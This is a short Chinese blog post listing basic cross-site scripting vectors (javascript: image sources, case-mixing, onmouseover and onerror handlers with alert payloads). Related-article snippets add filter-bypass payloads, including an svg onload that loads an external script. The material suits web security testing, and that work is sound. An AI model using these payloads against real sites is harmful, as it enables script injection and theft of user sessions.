XSS的一些简单姿势

最新推荐文章于 2023-05-25 00:08:13 发布
最新推荐文章于 2023-05-25 00:08:13 发布
阅读量553 收藏
点赞数
分类专栏: xss 文章标签: xss 简单姿势
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45053353/article/details/90138315
版权

XSS的一些简单姿势

通过javascript指令实现的图片

图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的例子仅仅展示了一种其他标签依旧通用的原理。)

<IMG SRC="javascript:alert('XSS');">

无引号无分号

<IMG SRC=javascript:alert('XSS')>

不区分大小写的xss攻击向量

<IMG SRC=JaVaScRiPt:alert('XSS')>

默认SRC属性去绕过SRC域名检测过滤器

这将绕过绝大多数SRC域名过滤器。插入javascript代码在任何一个事件方法同样适用于热河一个HTML标签,例如Form、Iframe、Input、Embed等等。他将也允许任何任何该标签的相关事件去替换,例如onblur, onclick等,后面我们会附加一个可用的事件列表。由David Cross提供,Abdullah Hussam编辑。

<IMG SRC=# onmouseover="alert('xxs')">

通过error事件触发alert

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

未完待续,一些自己的小心得,第一次发表,望大大们海涵。

小白hat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全测试之XSS绕过姿势总结
LYX_WIN
06-15 292
xss test
戏耍XSS的一些技巧
02-20
当你手工或者软件挖到一个页面的xss时(无论是反射xss或者储蓄xss都可以),这个时候想要深入的利用这个漏洞,该怎么做呢?用WebRTC来内网端口检测?盗取cookies(登陆页面和注册页面一般都不会有用户cookies)?用...
xss跨站脚本攻击姿势大全
qq_56438857的博客
05-25 893
xss攻击的四十种姿势
【Web 安全】XSS的三种姿势及其防范手段
weixin_54787877的博客
03-15 2684
介绍 XSS 是跨站脚本攻击(Cross Site Scripting)的简写,但是从首写字母命名的方式来看,应该取名 CSS,但这样就和层叠样式(Cascading Style Sheets,CSS)重名了,所以取名为 XSSXSS 攻击,一般是指攻击者通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式。 分类 XSS 攻击按是否把攻击数据存进服务器端,攻击行为是否伴随着攻击数据一直存在,可分为非持久型XSS攻击和持久型XSS攻击。 XSS 攻...
Xss多种姿势
浅浅徘徊的博客
03-19 701
xss攻击 字符编码 firefox下某参数为%c1\"alert(/xss/) var username="";alert(/xss/) 绕过长度限制 location.hash http://www.test.com#alert() onclick='eval(location.hash.substr(1)) 注释 多个input把中间注释&gt;&lt;!-...
12. xss bypass xss截屏
HWHXY的博客
01-25 1052
layout: post title: 12. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第12篇小文章,内容为某网站的xssbypass。 盲打存储xss 一般的存储xss,会遇到两种情况: 可以公网访问,则视后台的敏感程度定危害,一般可到高危。 不可以公网访问,打到cookie,如果没有证明危害,一般会给中危。 可蠕虫的用户xss,高危 不可蠕虫的普通的用户级别存储xss,中危 提升危害的方法 对于.
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss_javaxss_XSS_
10-04
java防止xss注入解决Java出现的xss
springboot整合XSS
03-20
springboot 整合预防xss攻击
XSS姿势——文件上传XSS
weixin_30399797的博客
04-20 648
XSS姿势——文件上传XSS 原文链接:http://brutelogic.com.br/blog/ 0x01 简单介绍 一个文件上传点是执行XSS应用程序的绝佳机会。很多网站都有用户权限上传个人资料图片的上传点,你有很多机会找到相关漏洞。如果碰巧是一个self XSS,你可以看看这篇文章。 0x02 实例分析 首先基本上我们都可以找到类似下面的一个攻击入口点,我觉得这个并...
xss姿势利用
weixin_30635053的博客
05-16 288
1.定位页面可以出现xss的位置 可能会出现联合点利用 一个页面多个存储位置或者一个页面多个参数联合利用 例如输入xss 查看页面源码页面里有多个xss 或者多个参数显示 可以利用 需要注意的是有的是js动态加载标签或者iframe嵌套和框架嵌套 需要去审查元素 如果xss位置在js 可以直接利用js弱语言的特性直接写js 如果xss位置在html 标签属性中 可以先判断闭...
XSS————XSS绕过Bypass的各种各样姿势
Fly_鹏程万里
04-16 1万+
XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。以一个网上商城应用Magento中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode为例,部分代...
xss 姿势
henwanyan的博客
02-22 837
1.http://www.backlion.org/?p=6218 2.https://www.leavesongs.com/PENETRATION/xss-collect.html 3.文件上传XSS:  http://www.55118885.com/w/529184.html 4.https://xianzhi.aliyun.com/forum/read/536.html 5.理解x
xss挑战之旅less5-less10,步骤加截图。
weixin_56513549的博客
02-17 254
5.欢迎来到level5 6.变换大小写绕过 "> <SCRIpt>alert(6)</SCriPT> 7.双写绕过 "><scscriptript>alert(7)<sriscriptpt> "><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>// 8."script"转换为"scr_ipt","on"转换为"o_n","src"转换.
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
XSS绕过姿势总结
nigo134的博客
07-16 1353
0x00 XSS基本测试流程 原则是“见框就插”,多动手,这里分享几个经典测试payload: "><svg/onload=alert(1)// 具体引用外部js的代码姿势是: <svg/onload=s=createElement('script');body.appendChild(s);s.src='js地址'// 在火狐浏览器下查看的效果(浏览器解析时会自动加上引号): <a href="javascript:alert(1)" >click me
xss基础知识
土拨鼠挖洞中的博客
10-03 5306
  XSS 概述 指攻击者利用网站程序对用户的输入输出过滤不足,导致恶意代码在页面执行,对受害者造成cookie资料窃取、会话劫持、钓鱼欺骗等危害;     XSS危害 1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号; 2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作 3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、...
XSS过滤速查表
Fizz`s Blog
11-12 2892
初见于Freebuf,放在这里收藏一下。 就是OWASP的速查表 不过是中文的 1.介绍 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP
在站点上进行简单xss测试脚本
最新发布
08-30
在进行简单XSS测试脚本时,我们需要先了解XSS的概念。XSS(跨站脚本攻击)是一种常见的Web安全漏洞,其中攻击者通过在受害者的浏览器上执行恶意脚本来利用受害者。为了验证站点是否存在XSS漏洞,我们可以编写简单的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值